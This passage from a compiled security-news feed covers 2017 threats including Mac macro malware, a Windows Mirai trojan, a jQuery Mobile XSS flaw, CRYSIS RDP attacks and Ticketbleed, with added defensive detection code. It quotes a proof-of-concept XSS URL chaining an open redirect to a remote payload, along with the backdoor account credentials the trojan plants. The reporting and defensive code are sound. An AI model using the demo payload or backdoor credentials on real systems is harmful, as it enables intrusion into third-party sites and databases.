The threat is all the greater because these attacks increasingly use encryption. This greatly increases the effectiveness of DDoS attacks, because decrypting the traffic considerably complicates the process of filtering malicious requests from legitimate ones.


Watch Out! First-Ever Word Macro Malware for Apple Mac OS Discovered in the Wild
10.2.2017 thehackernews Apple

After targeting Windows-based computers over the past few years, hackers are now shifting their interest to Macs as well.
The emergence of the first macro-based Word document attack against Apple's macOS platform is the latest example to prove this.
The concept of macros dates back to the 1990s. You might be familiar with the message that reads: "Warning: This document contains macros."
A macro is a series of commands and actions that help automate some tasks. Microsoft Office programs support macros written in Visual Basic for Applications (VBA), but they can also be used for malicious activities like installing malware.
Until now, hackers were cleverly using this technique to target Windows.
However, security researchers have now detected the first in-the-wild instance of hackers making use of malicious macros in Word documents to install malware on Mac computers and steal data – an old Windows technique.
The hack tricks victims into opening infected Word documents that subsequently run malicious macros. One such malicious Word file discovered by the researcher was titled "U.S. Allies and Rivals Digest Trump's Victory – Carnegie Endowment for International Peace.docm."
However, after clicking on the malicious Word document and before running it on your system, Mac users are always prompted to enable macros.
Denying permission can save you, but if enabled ignoring warnings, the embedded macro executes a function, coded in Python, that downloads the malware payload to infect the Mac PCs, allowing hackers to monitor webcams, access browser history logs, and steal password and encryption keys.
According to a blog post published this week by Patrick Wardle, director of research at security firm Synack, the Python function is virtually identical to EmPyre – an open source Mac and Linux post-exploitation agent.
"It’s kind of a low-tech solution, but on one hand it’s abusing legitimate functionality so it’s not going to crash like a memory corruption or overflow might, and it’s not going to be patched out," said Wardle.
Wardle tracked the IP address from which the malicious Word documents were spread to Russia and that IP has previously been associated with malicious activities like phishing attacks.
Another malicious attack discovered by researchers this week also relied on a standard Windows technique: it prompts users to download and install a fake software update, which actually harvests the user's Keychain, phishes usernames and passwords, and collects other sensitive data.
The MacDownloader malware presented itself as both an update for Adobe Flash and the Bitdefender Adware Removal Tool, prompts which are always annoying and dismissed by most users.
This is exactly what the attackers want. Whether the user clicks to reject the update or presses yes to dismiss it once and for all, the malware gets the green signal to harvest the user's keychain, phish usernames and passwords, collect private and sensitive data, and send them back to the attackers.
Researchers have spotted the macOS malware targeting mostly the defense industry, and it is reported to have been used against a human rights advocate.
The best way to avoid these kinds of attacks is simply to deny permission for macros to run when opening a suspicious Word document, and to avoid downloading software from third-party app stores or untrusted websites.
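The lure described above only works if the document actually carries a macro, so a mail gateway or endpoint agent can flag such files before the "enable macros" prompt is ever shown. The following is an added example, not code from the article or from Synack's analysis; it inspects the Office Open XML zip structure (macro code lives in word/vbaProject.bin and the manifest declares the macro-enabled main part), and the sample documents it builds are constructed stand-ins, not real Word files.

```python
"""Flag Word documents that carry VBA macros before anyone opens them."""
import io
import zipfile

# Content type Word assigns to the main part of a macro-enabled (.docm) file.
MACRO_MAIN_PART = "application/vnd.ms-word.document.macroEnabled.main+xml"
# Content type of the main part of a plain .docx.
PLAIN_MAIN_PART = ("application/vnd.openxmlformats-officedocument."
                   "wordprocessingml.document.main+xml")


def inspect_office_zip(data: bytes) -> dict:
    """Return macro indicators for an OOXML file supplied as bytes."""
    result = {"is_zip": False, "has_vba_project": False,
              "declares_macro_enabled": False}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result  # not OOXML at all (legacy .doc, or junk)
    result["is_zip"] = True
    names = zf.namelist()
    # The VBA project binary is where the macro code actually lives.
    result["has_vba_project"] = any(
        n.lower().endswith("vbaproject.bin") for n in names)
    if "[Content_Types].xml" in names:
        manifest = zf.read("[Content_Types].xml").decode("utf-8", "replace")
        result["declares_macro_enabled"] = MACRO_MAIN_PART in manifest
    return result


def verdict(filename: str, data: bytes) -> str:
    """Classify a file as no_macros, macro_document or macro_in_docx.

    macro_in_docx means macro content inside a file whose extension
    claims it is a plain .docx, which deserves its own alert.
    """
    r = inspect_office_zip(data)
    has_macro = r["has_vba_project"] or r["declares_macro_enabled"]
    if not has_macro:
        return "no_macros"
    if filename.lower().endswith(".docx"):
        return "macro_in_docx"
    return "macro_document"


def build_sample(with_macro: bool) -> bytes:
    """Construct a minimal stand-in OOXML zip for testing (not a real Word file)."""
    main_ct = MACRO_MAIN_PART if with_macro else PLAIN_MAIN_PART
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types><Override PartName="/word/document.xml" '
                    f'ContentType="{main_ct}"/></Types>')
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00constructed\x00")
    return buf.getvalue()


if __name__ == "__main__":
    # File name taken from the article; the content is the constructed sample.
    lure = "U.S. Allies and Rivals Digest Trump's Victory.docm"
    print(lure, "->", verdict(lure, build_sample(True)))
    print("report.docx ->", verdict("report.docx", build_sample(False)))
```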


New Windows Trojan Spreads MIRAI Malware To Hack More IoT Devices
10.2.2017 thehackernews Virus

MIRAI, possibly the biggest IoT-based malware threat to emerge last year, caused a vast internet outage in October last year by launching massive distributed denial-of-service (DDoS) attacks against the popular DNS provider Dyn.
Now, the infamous malware has updated itself to boost its distribution efforts.
Researchers from Russian cyber-security firm Dr.Web have now uncovered a Windows Trojan built with the sole purpose of helping hackers spread Mirai to even more devices.
Mirai is a malicious software program for Linux-based internet-of-things (IoT) devices that scans for insecure IoT devices, enslaves them into a botnet, and then uses them to launch DDoS attacks; it spreads over Telnet by using factory default device credentials.
It all started in early October last year, when a hacker publicly released the source code of Mirai.
Dubbed Trojan.Mirai.1, the new Trojan targets Windows computers and scans the user's network for compromisable Linux-based connected devices.
Once installed on a Windows computer, the Trojan connects to a command-and-control (C&C) server from which it downloads a configuration file containing a range of IP addresses, then attempts authentication over several ports such as 22 (SSH) and 23 (Telnet), 135, 445, 1433, 3306 and 3389.
Successful authentication lets the malware run certain commands specified in the configuration file, depending on the type of compromised system.
In the case of Linux systems accessed via the Telnet protocol, the Trojan downloads a binary file onto the compromised device, which subsequently downloads and launches Linux.Mirai.
"Trojan.Mirai.1's Scanner can check several TCP ports simultaneously. If the Trojan successfully connects to the attacked node via any of the available protocols, it executes the indicated sequence of commands," claimed the company in an advisory published this week.
Once a machine is compromised, the Trojan can spread itself to other Windows devices, helping hackers hijack even more devices.
Besides this, researchers noted that the malware can also identify and compromise database services running on various ports, including MySQL and Microsoft SQL, to create a new admin user “phpminds” with the password “phpgodwith,” allowing attackers to steal the database.
At this time it’s not known who created this, but the attack design demonstrates that IoT devices that are not directly accessible from the internet can also be hacked to join the Mirai botnet army.


Every website that uses jQuery Mobile, and has any open redirect is vulnerable to XSS
10.2.2017 seccuritaffairs Mobil

Every website that uses jQuery Mobile, and has any open redirect anywhere is vulnerable to cross-site scripting (XSS) attacks.
The jQuery Foundation’s jQuery Mobile project is an HTML5-based framework that allows users to design a single responsive web site or application that will work on all popular mobile devices and desktop systems.

According to the foundation, jQuery Mobile is currently used on more than 150,000 active websites. Google security engineer Eduardo Vela discovered that the jQuery Mobile framework can expose websites to cross-site scripting (XSS) attacks if they are also affected by an open redirect vulnerability.

A few months ago, Vela was searching for CSP bypasses and noticed an interesting behavior of jQuery Mobile: it would fetch any URL in the location.hash and put it in innerHTML, a behavior an attacker could exploit under specific conditions. “I thought that was pretty weird, so decided to see if it was vulnerable to XSS,” Vela wrote.

Vela started searching for an XSS vulnerability and described the following attack flow:

jQuery Mobile checks if you have anything in location.hash.
If your location.hash looks like a URL, it will try to set history.pushState on it, then it will do an XMLHttpRequest to it.
Then it will just innerHTML the response.
The expert explained that although history.pushState should prevent XSS attacks, it is still possible to exploit this kind of flaw if the website is affected by an open redirect vulnerability.

Below is the demo provided by Vela:

http://jquery-mobile-xss.appspot.com/#/redirect?url=http://sirdarckcat.github.io/xss/img-src.html

According to the expert, there are many websites vulnerable to such attacks because many organizations don’t consider open redirects to be security vulnerabilities; such issues are present in major websites such as Google, YouTube, Facebook, Baidu, and Yahoo.

Now the bad news!

Vela reported the flaw to the jQuery Mobile development team, but it will likely not be fixed due to the potential impact of a fix on existing applications. The development team has acknowledged the risks to its users.

“The jQuery Mobile team explained that they consider the Open Redirect to be the vulnerability, and not their behavior of fetching and inlining, and that they wouldn’t want to make a change because that might break existing applications. This means that there won’t be a patch as far as I have been informed. The jQuery mobile team suggests to 403 all requests made from XHR that might result in a redirect.” wrote Vela.

“This means that every website that uses jQuery Mobile, and has any open redirect anywhere is vulnerable to XSS.”

Vela is inviting experts to try to exploit the same XSS in the absence of an open redirect vulnerability; he already tried it himself, but without success.

“One opportunity for further research, if you have time in your hands is to try to find a way to make this bug work without the need of an Open Redirect. I tried to make it work, but it didn’t work out,” added Vela.

“In my experience, Open Redirects are very common, and they are also a common source of bugs. Perhaps we should start fixing Open Redirects. Or perhaps we should be more consistent on not treating them as vulnerabilities. Either way, for as long as we have this disagreement in our industry, we at least get to enjoy some XSS bugs.”


CRYSIS Ransomware is back and crooks are using RDP attacks once again
10.2.2017 seccuritaffairs Virus

CRYSIS ransomware attacks leveraging brute force via Remote Desktop Protocol (RDP) are still ongoing, mostly targeting US firms in the healthcare sector.
Do you remember the CRYSIS ransomware? It appeared in the threat landscape last year, and now researchers at Trend Micro have discovered that it is being distributed via Remote Desktop Protocol (RDP) brute force attacks.

The malware was spread with the same technique in September 2016, when crooks targeted businesses in Australia and New Zealand. Now cyber criminals are targeting organizations across the world.

The researchers at Trend Micro observed a significant increase in the number of CRYSIS ransomware infections in January 2017 compared to the previous months. The last wave of attacks mostly targeted US organizations in the healthcare industry.

“In fact, the volume of these attacks doubled in January 2017 from a comparable period in late 2016. While a wide variety of sectors have been affected, the most consistent target has been the healthcare sector in the United States.” states the blog post published by Trend Micro.

The researchers believe that behind the two campaigns there are the same threat actors.

“We believe that the same group of attackers is behind the earlier attacks and the current campaign. The file names being used are consistent within each region. Other parts of this attack—such as where the malicious files are dropped onto the compromised machine—are also consistent.” continues the report.

The attackers used a folder shared on the remote PC to transfer malware from their machine, and in some cases, they used the clipboard to transfer files.

Both techniques expose the local resources of the attacker to the remote machine, and vice-versa.

The researchers observed multiple login attempts with commonly used credentials; once the attackers determined the correct username and password, they usually came back multiple times within a short period trying to infect the endpoint.

“In one particular case, we saw CRYSIS deployed six times (packed different ways) on an endpoint within a span of 10 minutes. When we went over the files that were copied, they were created at various times during a 30-day period starting from the time of the first compromise attempt. The attackers had multiple files at their disposal, and they were experimenting with various payloads until they found something that worked well.” states the report.

Trend Micro suggests that organizations apply proper security settings in Remote Desktop Services, for example disabling access to shared drives and the clipboard, making it impossible for attackers to copy malicious payloads via RDP.

The experts also suggest carefully monitoring logs to identify the attackers’ IP addresses.
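The pattern the researchers describe, a burst of failed RDP logons from one address followed by a successful one with the guessed credentials, is exactly what log monitoring should pick out. The following is an added example, not from Trend Micro's report: it runs that logic over constructed Windows Security log records (event 4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive, i.e. RDP); the thresholds and addresses are assumptions.

```python
"""Flag RDP brute-force attempts, and the successful logon that follows them."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5               # failed logons from one source ...
WINDOW = timedelta(minutes=10)   # ... within this window raise an alert
RDP_LOGON_TYPE = 10              # RemoteInteractive in Windows Security logs
TIME_FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample: (time, event_id, logon_type, target_user, source_ip).
SAMPLE_EVENTS = [
    ("2017-01-12 03:00:01", 4625, 10, "administrator", "203.0.113.7"),
    ("2017-01-12 03:00:04", 4625, 10, "admin",         "203.0.113.7"),
    ("2017-01-12 03:00:09", 4625, 10, "backup",        "203.0.113.7"),
    ("2017-01-12 03:00:15", 4625, 10, "scanner",       "203.0.113.7"),
    ("2017-01-12 03:00:21", 4625, 10, "administrator", "203.0.113.7"),
    ("2017-01-12 03:00:30", 4625, 10, "administrator", "203.0.113.7"),
    ("2017-01-12 03:01:02", 4624, 10, "administrator", "203.0.113.7"),  # got in
    ("2017-01-12 08:15:00", 4625, 10, "jsmith",        "198.51.100.5"),  # typo
    ("2017-01-12 08:15:20", 4624, 10, "jsmith",        "198.51.100.5"),
    ("2017-01-12 09:00:00", 4624, 2,  "jsmith",        "127.0.0.1"),     # console
]


def detect_rdp_bruteforce(events, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return alerts for RDP password guessing and for guesses that succeeded.

    Failures are kept per source address in a sliding time window; a
    success (4624) arriving while the window still holds >= threshold
    failures is reported as a compromise, which is the case to act on.
    """
    failures = defaultdict(deque)   # source_ip -> timestamps of recent 4625s
    alerts = []
    for ts_str, event_id, logon_type, user, src in sorted(events):
        if logon_type != RDP_LOGON_TYPE:
            continue                 # only RDP logons are of interest here
        ts = datetime.strptime(ts_str, TIME_FMT)
        recent = failures[src]
        while recent and ts - recent[0] > window:
            recent.popleft()         # drop failures that fell out of the window
        if event_id == 4625:
            recent.append(ts)
            if len(recent) == threshold:
                alerts.append({"kind": "rdp_bruteforce", "src": src,
                               "failures": len(recent), "at": ts_str})
        elif event_id == 4624 and len(recent) >= threshold:
            alerts.append({"kind": "rdp_bruteforce_success", "src": src,
                           "user": user, "failures": len(recent), "at": ts_str})
            recent.clear()           # one alert per guessed password
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(alert)
```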


Ticketbleed flaw in F5 Networks BIG-IP appliances exposed to remote attacks

9.2.2017 securityaffairs Attack

F5 Networks BIG-IP appliances are affected by a serious vulnerability, tracked as CVE-2016-9244 and dubbed ‘Ticketbleed’, that exposes them to remote attacks.
The F5 Networks BIG-IP appliances are affected by a serious flaw, tracked as CVE-2016-9244 and dubbed ‘Ticketbleed’, that can be exploited by a remote attacker to extract the content of the memory, including sensitive data (i.e. SSL session IDs).

The list of F5 BIG-IP products affected by the flaw includes LTM, AAM, AFM, Analytics, APM, ASM, GTM, Link Controller, PEM and PSM.

The CVE-2016-9244 vulnerability was discovered by the popular security expert Filippo Valsorda and his colleagues at CloudFlare while investigating a bug report from one of their customers.

“The vulnerability lies in the implementation of Session Tickets, a resumption technique used to speed up repeated connections. When a client supplies a Session ID together with a Session Ticket, the server is supposed to echo back the Session ID to signal acceptance of the ticket. Session IDs can be anywhere between 1 and 31 bytes in length,” said Valsorda.

“The F5 stack always echoes back 32 bytes of memory, even if the Session ID was shorter. An attacker providing a 1-byte Session ID would then receive 31 bytes of uninitialized memory.”

The group reported the issue to F5 in late October; the company confirmed that the issue affects BIG-IP SSL virtual servers that have the non-default Session Tickets option enabled.

“A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacker may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. It is possible that other data from uninitialized memory may be returned as well.” reads the security advisory published by F5.

Ticketbleed is reminiscent of the dangerous Heartbleed flaw in the OpenSSL library; however, unlike Heartbleed, Ticketbleed exposes only 31 bytes of memory at a time instead of 64 KB.

Ticketbleed is clearly less efficient than Heartbleed because it requires more rounds to carry out, and it affects only F5 products. An Internet scan showed that hundreds of hosts were exposed by the flaw.

As a workaround, the company suggests disabling the Session Tickets option on the vulnerable Client SSL profile; this can be done from the “Local Traffic > Profiles > SSL > Client” menu of the Configuration utility.

Filippo Valsorda has developed a free online tool that can be used to check whether a product is affected by the Ticketbleed issue.

Internet scans conducted by the researcher showed that 949 of the Alexa top one million websites were vulnerable, including 15 in the top 10,000 sites. Of the top one million hosts on Cisco’s Umbrella cloud security platform, over 1,600 were found to be affected.

Valsorda has provided detailed technical information on the vulnerability and made some recommendations for security vendors that might consider trying to detect potential Ticketbleed attacks.


ENISA Threat Landscape Report 2016, who is attacking us, and how?
9.2.2017 securityaffairs Attack

ENISA has issued the annual ENISA Threat Landscape Report 2016, a document that synthesizes the emerging trends in cyber security.
The European Union Agency for Network and Information Security (ENISA) is an EU agency composed of security experts who work with member states, public organizations and private groups to develop advice and recommendations on good practice in information security.

I’m very proud to be a member of the group that annually publishes an interesting report summarizing the top cyber threats identified during the last 12 months.

The new report, titled ENISA Threat Landscape Report 2016, analyzes the huge number of cyber-incidents that made the headlines in 2016, focusing on threat actors and their TTPs (Tactics, techniques, and procedures).

The document is composed of the following sections:

“Cyber Threat Intelligence and ETL” provides an overview of recent developments in cyber-threat intelligence, positions the ETL, and summarizes some cyber-threat intelligence issues that are seen as emerging.
“Top Cyber-Threats” provides the results of the yearly threat assessment for the top 15 cyber-threats.
“Threat Agents” is an overview of threat actors.
“Attack Vectors”
“Conclusions” and some policy, business and research recommendations.
“ETL 2016 is streamlined towards the top cyber-threats, providing information on threat agents and attack vectors including all the remarkable developments, trends and issues. Moreover, it reports about threat agents their motivations, and how their practices, tools and techniques have advanced.” reads the introduction to the report.

The ENISA Threat Landscape Report 2016 is an impressive source of data and references to the events that characterized the threat landscape in 2016.

The vast majority of attacks were financially and politically motivated; the year 2016 is thus characterized by “the efficiency of cyber-crime monetization.” Crooks have monetized their efforts not only through the illegal activities they conducted but also by offering their services through the consolidated sales model known as “crime-as-a-service.”

Fortunately, we are observing an increasing maturity of defenders in dealing with cyber threats, and successful efforts by international law enforcement agencies, which conducted many operations disrupting criminal organizations.

However, attackers are still one step ahead, as explained in the report. Despite the advances of defenders, attackers have shown their superiority in:

Abusing unsecured components to mobilize a very large attack potential, a capacity that has been demonstrated by means of DDoS attacks from infected IoT devices.
Successfully launching extortion attacks that have targeted commercial organisations and have achieved very high levels of ransom and high rates of paying victims.
Demonstrating the very big impact achieved by multi-layered attacks to affect the outcome of democratic processes, as in the example of the US elections.
Operating large malicious infrastructures that are managed efficiently and resiliently to withstand takedowns and allow for quick development and multi-tenancy.

Malware remains the principal cyber-threat in 2016: the number of samples reached ca. 600 million per quarter, and mobile malware (which grew by ca. 150%) and ransomware have monopolized the threat landscape. Web-based attacks and web application attacks follow malware in the Top 15; no change has been observed with respect to 2015.
Web based attacks include malicious URLs, compromised domains, browser exploits and drive-by attacks.

“Web based attacks are those that use web components as an attack surface. As web components we understand parts of the web infrastructure, such as web servers, web clients (browsers) content management systems (CMS) and browser extensions” states the report.

The category of web application attacks includes classic techniques like cross-site scripting and SQL injection (SQLi), which continue to be a privileged attack vector for threat actors. In fourth place there are botnets; these infrastructures are an essential component of a large number of cyber attacks.

DDoS attacks reached fourth place; this is the result of extortion activities and the availability in the criminal underground of DDoS-for-hire services that offer wannabe hackers everything necessary to launch a powerful attack.

The report also provides an interesting analysis of the top threat actors observed in 2016. Cyber-criminals, insiders, cyber spies, hacktivists, cyber fighters, cyber terrorists and script kiddies operate with different techniques, but in many cases the experts observed an overlap of their TTPs caused by the evolution of the crime-as-a-service model.

The ENISA Threat Landscape Report 2016 also associates the various threats with the above threat agents, an interesting exercise that allows us to better profile the attackers.

Based on the material ENISA’s experts collected, the report provides conclusions for policy makers, businesses, and research.

“As we speak, the cyber-threat landscape is receiving significant high-level attention: it is on the agenda of politicians in the biggest industrial countries. This is a direct consequence of ‘cyber’ becoming mainstream, in affecting people’s opinions and influencing the political environment of modern societies. Besides this, a lot of developments have taken place regarding the tools and tactics used by adversaries, making 2016 another striking sample of the dynamics of cyber-space. ETL 2016 reflects these developments, while providing strategic information about the cyber-threats and their technical evolution during 2016,” commented Prof. Udo Helmbrecht, Executive Director of ENISA.

I consider the ENISA Threat Landscape Report 2016 a must-read for security experts in every industry and executives of any sector; I don’t want to tell you more, enjoy it.

The ETL report and related material can be found under the following links:

ETL 2016
Thematic Landscape Hardware
Thematic Landscape Ad-hoc and sensor networking for M2M communications
ENISA Threat Taxonomy


Researchers at Dr Web spotted a Windows version of the Mirai bot
9.2.2017 securityaffairs Virus

Researchers at the antivirus firm Dr.Web discovered a new strain of the Mirai bot, a Windows variant, targeting more ports.
Security experts at the antivirus firm Dr.Web discovered a new strain of the Mirai bot: a Windows version of the popular IoT malware that targets more ports.

The Windows version of the Mirai bot was being used by criminals to infect IoT devices and carry out DDoS attacks by spreading the Mirai Linux malware.

“One of the recent developments on the Mirai malware front was discovered by Russian cyber-security firm Dr.Web, whose experts came across a Windows trojan built with the sole purpose of helping Mirai spread to even more devices” wrote BleepingComputer.com.

The Mirai malware was spotted by the researcher MalwareMustDie in August 2016; it was specifically designed to target IoT devices.

It infected thousands of routers and IoT devices, including DVRs and CCTV systems. When the Mirai bot infects a device, it chooses random IPs and attempts to log in via the Telnet and SSH ports using a list of admin credentials.

Back to the present, the researchers from Dr. Web dubbed the threat Trojan.Mirai.1.

“A Trojan for Microsoft Windows written in C++. Designed to scan TCP ports from the indicated range of IP addresses in order to execute various commands and distribute other malware.” states Dr. Web.

“When launched, the Trojan connects to its command and control server, downloads the configuration file (wpd.dat) and extracts the list of IP addresses. Then the scanner is launched: it refers to the listed addresses and simultaneously checks several ports.”

Unlike the original Mirai Linux malware, Trojan.Mirai.1 scans more ports.

“The Trojan can address the following ports:

* 22
* 23
* 135
* 445
* 1433
* 3306
* 3389
When Trojan.Mirai.1 succeeds in infecting a new device, if the device runs the Linux OS, it executes a series of commands which end with the creation of a new DDoS Mirai bot. Instead, if the infected device is running the Windows OS, it releases a copy of itself.

“It also creates a DBMS user with login Mssqla and password Bus3456#qwein, and grants him sysadmin privileges. Acting under the name of this user and with the help of the SQL server event service, various tasks are executed.” continues the analysis.

“The only exception is a connection via RDP protocol: in this case, none of the instructions are executed. Besides that, while connecting to the Linux device via Telnet protocol, it downloads a binary file on the compromised device, and this file subsequently downloads and launches Linux.Mirai.”

Below are some of Trojan.Mirai.1’s hashes (SHA1):

9575d5edb955e8e57d5886e1cf93f54f52912238
f97e8145e1e818f17779a8b136370c24da67a6a5
42c9686dade9a7f346efa8fdbe5dbf6fa1a7028e
938715263e1e24f3e3d82d72b4e1d2b60ab187b8
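From the defender's side, the behaviour the two Dr.Web write-ups describe is a single Windows host contacting many neighbours on the fixed port set 22, 23, 135, 445, 1433, 3306 and 3389 in a short time, which stands out in firewall or NetFlow records. The following is an added example, not Dr.Web's code: a port-sweep detector run over constructed flow records; the threshold, window and addresses are assumptions.

```python
"""Spot a Trojan.Mirai.1-style internal port sweep in flow records."""
from collections import defaultdict
from datetime import datetime, timedelta

# Port set quoted from the Dr.Web advisory above.
MIRAI_WIN_PORTS = {22, 23, 135, 445, 1433, 3306, 3389}
HOST_THRESHOLD = 8              # distinct destinations from one source ...
WINDOW = timedelta(minutes=5)   # ... inside this window count as a sweep
TIME_FMT = "%Y-%m-%d %H:%M:%S"


def _constructed_scan():
    """One workstation probing twelve neighbours, cycling through the ports."""
    ports = sorted(MIRAI_WIN_PORTS)
    return [("2017-02-08 14:10:%02d" % i, "10.0.0.15", "10.0.1.%d" % i,
             ports[i % len(ports)]) for i in range(1, 13)]


# Constructed sample flows: (time, src_ip, dst_ip, dst_port).
SAMPLE_FLOWS = _constructed_scan() + [
    ("2017-02-08 14:11:00", "10.0.0.20", "10.0.0.200", 445),   # normal file share
    ("2017-02-08 14:12:00", "10.0.0.20", "10.0.0.200", 445),
    ("2017-02-08 14:13:00", "10.0.0.30", "10.0.0.201", 3389),  # one admin RDP session
    ("2017-02-08 14:13:05", "10.0.0.30", "10.0.0.201", 80),    # port outside the set
]


def detect_port_sweep(flows, ports=MIRAI_WIN_PORTS,
                      host_threshold=HOST_THRESHOLD, window=WINDOW):
    """Return {src_ip: {distinct_hosts, ports}} for sources that swept.

    For every source the flows to the watched ports are ordered by time and
    a sliding window counts how many distinct destinations it touched; the
    peak count is compared with the threshold.
    """
    by_src = defaultdict(list)
    for ts_str, src, dst, dport in flows:
        if dport in ports:
            by_src[src].append((datetime.strptime(ts_str, TIME_FMT), dst, dport))

    alerts = {}
    for src, recs in by_src.items():
        recs.sort()
        in_window = defaultdict(int)   # dst -> flows currently inside the window
        ports_seen = set()
        oldest = 0
        peak = 0
        for ts, dst, dport in recs:
            in_window[dst] += 1
            ports_seen.add(dport)
            # Slide the window start forward past flows older than `window`.
            while recs[oldest][0] < ts - window:
                old_dst = recs[oldest][1]
                in_window[old_dst] -= 1
                if in_window[old_dst] == 0:
                    del in_window[old_dst]
                oldest += 1
            peak = max(peak, len(in_window))
        if peak >= host_threshold:
            alerts[src] = {"distinct_hosts": peak, "ports": sorted(ports_seen)}
    return alerts


if __name__ == "__main__":
    for src, info in detect_port_sweep(SAMPLE_FLOWS).items():
        print(src, "swept", info["distinct_hosts"], "hosts on ports", info["ports"])
```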


5 Anti-Surveillance tools that can help you enhance online security and privacy
9.2.2017 securityaffairs Safety

The current digital era is filled with all sorts of cyber dangers. The following tools will help you remain safe by enhancing your online security and privacy.
There are many software tools that can help you preserve and protect your privacy online. For your benefit, I’ve compiled a list of the top 5 software tools that can help you protect your online privacy and security.

DuckDuckGo: Privacy Search Engine
DuckDuckGo was launched in 2008 as an alternative search engine that respects user privacy and claims to offer a “superior search experience with smarter answers.” It is one of the most popular search engines that provide real privacy and smarter search without tracking user activity.

This search engine doesn’t log or share any personally identifiable information. DuckDuckGo doesn’t use cookies, it immediately discards users’ IP addresses, and it keeps no record of the searches performed.

PureVPN: VPN Software
PureVPN is a highly regarded Hong Kong-based VPN service offering an unusually wide range of software clients for different platforms, including Windows, Mac, Ubuntu Linux, mobile apps for Android and iOS, and manual configuration for Windows Phone.

PureVPN operates a self-managed VPN network that currently stands at 750+ servers in 141 countries, including seldom-covered areas such as Oceania, Africa, and Central America. It provides an extra layer of privacy: it doesn’t collect or log your online activities and doesn’t monitor what you do online. It promises the best online privacy.

PureVPN supports a wide variety of security protocols, such as OpenVPN, IPSec/L2TP, PPTP, SSTP, and IKEv2. It encrypts your entire internet connection with 256-bit encryption to protect your data and online activities.

ProtonMail: Email Encryption Software
ProtonMail is a free, encrypted email client which enhances your email security to keep your data safe. It’s also available on smartphones with dedicated apps for Android and iOS. It provides complete email security with end-to-end encryption; your emails as well as your contacts always stay private.

Cryptocat: Secure Chat software
Cryptocat is one of the most secure chat applications for your computer, allowing you to chat with your friends in complete privacy. Every message you send via this app is secured with end-to-end encryption, which ensures that all of your communications with other Cryptocat users remain protected.

This open source desktop application is available for Windows, OS X and Linux. With this software, you can also share encrypted files, pictures and videos with your buddies safely and easily. Cryptocat users can also receive messages even when they’re offline.

HTTPS Everywhere: Privacy Browser Extension
HTTPS Everywhere is a free extension available for Chrome, Firefox and Opera, developed primarily by the Tor Project and the Electronic Frontier Foundation (EFF). It makes websites use the more secure HTTPS connection instead of HTTP where they support it, encrypting your communications with many websites.

We hope that the above tools will help you increase your online privacy and security. If you have any suggestions that you think are worth adding to this list, feel free to let us know.

About Author (Anas Baig):

Anas Baig is a Digital Marketer & Security Enthusiast. He loves to read & write about Digital Security. If you are interested to get tweets about Marketing & Security !


jQuery Mobile Can Expose Websites to XSS Attacks

9.2.2017 securityweek Attack
A Google security engineer discovered that jQuery Mobile can expose websites to cross-site scripting (XSS) attacks if an open redirect vulnerability is also present.

The jQuery Foundation’s jQuery Mobile project is an HTML5-based user interface system designed for developing responsive websites and web applications that can be accessed from any type of device. According to BuiltWith, jQuery Mobile is currently used on more than 150,000 active websites.

Google’s Eduardo Vela discovered a few months ago that jQuery Mobile checks the location.hash, which returns the anchor part of a URL. If there is a URL in the location.hash, it uses the history.pushState method on it and adds it to an XMLHttpRequest object. The response to this request is used with innerHTML.

The use of history.pushState should prevent XSS attacks, but exploitation is still possible if the website is affected by an open redirect vulnerability. An example provided by Vela looks like this:

http://jquery-mobile-xss.appspot.com/#/redirect?url=http://sirdarckcat.github.io/xss/img-src.html

There may be many websites vulnerable to such attacks considering that some organizations, including Google, don’t treat open redirects as vulnerabilities. Open redirects can be found on major websites such as Google, YouTube, Facebook, Baidu and Yahoo.

The expert reported his findings to jQuery Mobile developers, but the problem will not be addressed any time soon due to concerns that changing the current behavior could break existing applications. The jQuery team has admitted that developers should be warned about the risks.

“One opportunity for further research, if you have time in your hands is to try to find a way to make this bug work without the need of an Open Redirect. I tried to make it work, but it didn't work out,” Vela wrote in a post on his personal blog.

“In my experience, Open Redirects are very common, and they are also a common source of bugs. Perhaps we should start fixing Open Redirects. Or perhaps we should be more consistent on not treating them as vulnerabilities. Either way, for as long as we have this disagreement in our industry, we at least get to enjoy some XSS bugs,” the researcher said.
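Both write-ups above leave the fix to site owners: the jQuery Mobile team suggests returning 403 to XHR requests that would redirect, and the chain disappears entirely if the redirect endpoint is no longer open. The following is an added example, not from Vela's post or from jQuery Mobile: a redirect handler applying both measures. The site host and the X-Requested-With convention are assumptions (jQuery sets that header on same-origin AJAX requests by default).

```python
"""Harden a /redirect?url=... endpoint against the jQuery Mobile XSS chain."""
from urllib.parse import urljoin, urlsplit

SITE_HOST = "www.example.com"  # assumed host of the application


def is_xhr(headers: dict) -> bool:
    """jQuery adds X-Requested-With: XMLHttpRequest to same-origin AJAX calls."""
    return headers.get("X-Requested-With", "").lower() == "xmlhttprequest"


def is_same_site(target: str, site_host: str = SITE_HOST) -> bool:
    """Accept only absolute URLs on our own host or absolute paths."""
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        # Relative target. "//evil" parses with a netloc and never gets here,
        # but a bare "evil.com/x" would, so insist on a single leading slash.
        return target.startswith("/") and not target.startswith("//")
    # javascript:, data: and protocol-relative forms fail this test.
    return (parts.scheme in ("http", "https")
            and parts.netloc.lower() == site_host)


def handle_redirect(headers: dict, target: str, site_host: str = SITE_HOST):
    """Return (status, Location) the way a view function would.

    403 for XHR callers is the jQuery Mobile team's workaround; 400 for
    off-site targets removes the open redirect the attack depends on.
    """
    if is_xhr(headers):
        return 403, None
    if not is_same_site(target, site_host):
        return 400, None
    return 302, urljoin(f"https://{site_host}/", target)


if __name__ == "__main__":
    # The target from Vela's demo URL, requested the way jQuery Mobile would.
    print(handle_redirect({"X-Requested-With": "XMLHttpRequest"},
                          "http://sirdarckcat.github.io/xss/img-src.html"))
    print(handle_redirect({}, "/account"))
```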


